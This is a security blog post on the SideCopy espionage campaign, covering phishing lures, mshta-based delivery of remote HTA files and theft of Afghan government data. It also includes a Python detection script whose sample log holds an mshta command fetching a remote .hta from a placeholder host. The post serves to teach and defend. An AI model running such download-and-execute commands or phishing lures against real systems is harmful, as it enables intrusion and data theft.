SideCopy: How an Intelligence Service Uses Phishbait

Stu Sjouwerman | Dec 7, 2021

Researchers at Malwarebytes offer more details on a spear phishing campaign run by a Pakistani threat actor that’s come to be known as “SideCopy.” The campaign was first reported by Facebook earlier this year.

“The SideCopy APT has been actively targeting government and military officials in South Asia,” Malwarebytes says. “The group mainly uses archived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office or Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor such as AllaKore or Action Rat.”
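The delivery chain quoted above (archive, then an LNK, Office file or trojanized application, then mshta.exe pulling a remote .hta) leaves a recognizable process-creation footprint. The following is an added detection sketch, not code from Malwarebytes or KnowBe4; it runs over constructed Sysmon-style process-creation records in a simplified `key=value|key=value` format and flags mshta.exe launches that reference a remote .hta or are spawned by an archiver, Office or the shell.

```python
"""Added example: hunt for the archive -> mshta -> remote .hta chain.
Log format and hostnames are constructed for this sketch."""
import re
from dataclasses import dataclass
from typing import Optional

# Parents that indicate a user opened something from an archive, a document or the shell.
USER_FACING_PARENTS = {"winrar.exe", "7zfm.exe", "explorer.exe", "winword.exe", "excel.exe"}
# mshta being handed a URL ending in .hta is the fileless download-and-execute step.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

@dataclass
class Detection:
    pid: int
    reason: str
    url: Optional[str]

def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' record (constructed, Sysmon-like fields)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))

def classify(event: dict) -> Optional[Detection]:
    """Return a Detection for suspicious mshta.exe launches, else None."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return None
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    match = REMOTE_HTA.search(cmd)
    if match:
        return Detection(int(event["ProcessId"]), "mshta fetching remote .hta", match.group(0))
    if parent in USER_FACING_PARENTS:
        return Detection(int(event["ProcessId"]), f"mshta spawned by {parent}", None)
    return None

def scan(lines):
    """Classify every non-empty record and keep only the hits, in log order."""
    return [d for d in (classify(parse_event(l)) for l in lines if l.strip()) if d]

# Constructed sample log: two hits (4012, 4020) and two benign records.
SAMPLE_LOG = """\
ProcessId=4012|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Program Files\\WinRAR\\WinRAR.exe|CommandLine=mshta http://example.invalid/update.hta
ProcessId=4020|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=mshta C:\\Users\\u\\Desktop\\note.hta
ProcessId=4031|Image=C:\\Windows\\explorer.exe|ParentImage=C:\\Windows\\System32\\userinit.exe|CommandLine=explorer.exe
ProcessId=4044|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\svchost.exe|CommandLine=mshta about:blank
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

The remote-URL rule is the higher-fidelity signal; the parent-process rule is broader and is better treated as a hunting lead than an alert on its own.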

The threat actor uses both targeted phishing emails and more generic lures against individuals in Afghanistan and India.

The targeted phishbait is designed to attract specific officials. “These lures are specially crafted and designed to target specific victims,” Malwarebytes says. “We believe this category is very well customized to target government or military officials.”

The generic lures include “romantic lures” with pictures of women to prompt users into opening the malicious attachments. The researchers believe that these emails were “used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks.”

Malwarebytes adds that the campaign has been successful at stealing information from government targets.

“The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan,” the researchers write. “As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.”

New-school security awareness training can enable your employees to thwart targeted social engineering attacks.

Malwarebytes has the story.
